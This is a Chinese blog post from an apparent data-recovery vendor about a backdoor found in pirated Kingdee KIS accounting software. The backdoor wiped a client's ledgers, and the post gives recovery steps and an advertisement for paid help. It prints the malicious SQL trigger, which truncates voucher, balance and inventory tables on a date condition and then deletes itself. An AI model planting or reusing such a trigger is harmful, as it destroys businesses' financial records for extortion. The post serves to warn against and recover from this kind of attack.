金蝶KIS专业版替换allinone和sxs.dll补丁(遭后门清空或破坏数据被修改为“恢复数据请联系”)

[全站通告]如需人工一对一付费服务(业务),请加微信 2589053300 进行沟通处理-非诚勿扰

近日在百度搜索来的一个客户,描述了一下自己用的金蝶KIS 12.2/12.3 专业版,网上下载的盗版,本想着用几年后就买正版或者找一个靠谱的版本使用,发现并无大碍,一直用到了2021年,用了近6年,2021年底早上进公司发现数据全部被篡改,如下图

数据恢复故障描述

看了一下客户的财务电脑,是XP的系统,果然很老了,被盗版补丁留下的后门入侵修改了所有数据,删除了所有备份! 毕竟做了这么多年的账,突然要付之东流,很是费解;

使用破解版财务软件,破解者破解后内藏了后门,清空所有数据的触发器。用了几年时间后,后门触发器被激活,删除了所有 科目余额表、存货余额、存货往来明细账、修改了所有 总账凭证、业务凭证、会计科目等,这样才可以所要更多的金额,说明做这漏洞的人,心机很重;

【临时处理方法】

此时建议立即停止SQL服务,分离数据库源文件,复制拷贝备份处理!切勿重装金蝶软件,切勿重装SQLserver!!如还原其他备份,需事先拷贝 事故后第一手文件,进行备份。不要用账套管理器进行备份,那样是没用的哦;

【数据恢复过程】

接到电话后,客户发来遭后门修改数据库文件,立即组织对数据库分析工作,发现数据库内有一个后门触发器 t_log_autoNumbe ,大致代码内容为:

if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1)

begin
if (@Flogdays>=15)
begin
TRUNCATE TABLE t_voucherEntry  --删除总账凭证
TRUNCATE TABLE t_balance --删除科目余额表
if @FVersion=‘8.0‘  --版本大于8.0
TRUNCATE TABLE icstockbillEntry --删除存货出入库明细账
else
TRUNCATE TABLE t_cc_stockbillEntry --删除出入库存货明细账
drop trigger t_log_AutoNumber
end
end

GO

1.对故障盘进行全盘镜像,对mdf文件进行备份,防止二次造成破坏。

2.对镜像盘进行扫描重组,对删除的表进行字段分析。

3.对mdf进行底层数据分析,与表结构进行匹配。

4.通过程序的匹配,找到所有删除表的原始ID。

5.通过ID和新表结构,对数据进行提取,生成SQL 脚本。

6.把SQL脚本附加到新的数据库中。

7.把未删除的表的数据进行迁移。

【恢复结果】:发回给客户测试验收,反馈数据基本正确,能恢复这个程度,也实属困难,客户很满意!得到客户的极大好评。

【温馨提示】:使用网上随便下载的破解版软件,危害很大;居心不良的破解者,可能会留下后门木马,删除修改数据,敲诈钱财。如果商用,请使用正版软件;如经济实力不允许,也不要到处下载软件所使用;

PS:好好的软件,为啥免费?还不是为了后期让你缴费,说白了就是让你支付更多的钱财;1、正版 2、找有技术或者技术支持的;

如需博主协助处理(收费),请加微信2589053300(非诚勿扰) --更多请关注:老梁`s Blog

所写所说,是心之所感,思之所悟,行之所得;文当无敷衍,落笔求简洁。 以所舍,求所获;有所依,方所成!

支付宝赞助
微信赞助

免责声明,若由于商用引起版权纠纷,一切责任均由使用者承担。

您必须遵守我们的协议,如您下载该资源,行为将被视为对《免责声明》全部内容的认可->联系老梁投诉资源
LaoLiang.Net部分资源来自互联网收集,仅供用于学习和交流,请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除。 敬请谅解! 侵权删帖/违法举报/投稿等事物联系邮箱:service@laoliang.net
意在交流学习,欢迎赞赏评论,如有谬误,请联系指正;转载请注明出处: » 金蝶KIS专业版替换allinone和sxs.dll补丁(遭后门清空或破坏数据被修改为“恢复数据请联系”)

发表评论

本站承接,网站推广(SEM,SEO),软件的安装的安装与调试,服务器的推荐以及配置,APP的开发与维护,网络或者web维护;财务软件,客户管理系统,人力资源,超市POS,医药管理,服务器安全,ecshop,金蝶,用友,管家婆;

立即查看 了解详情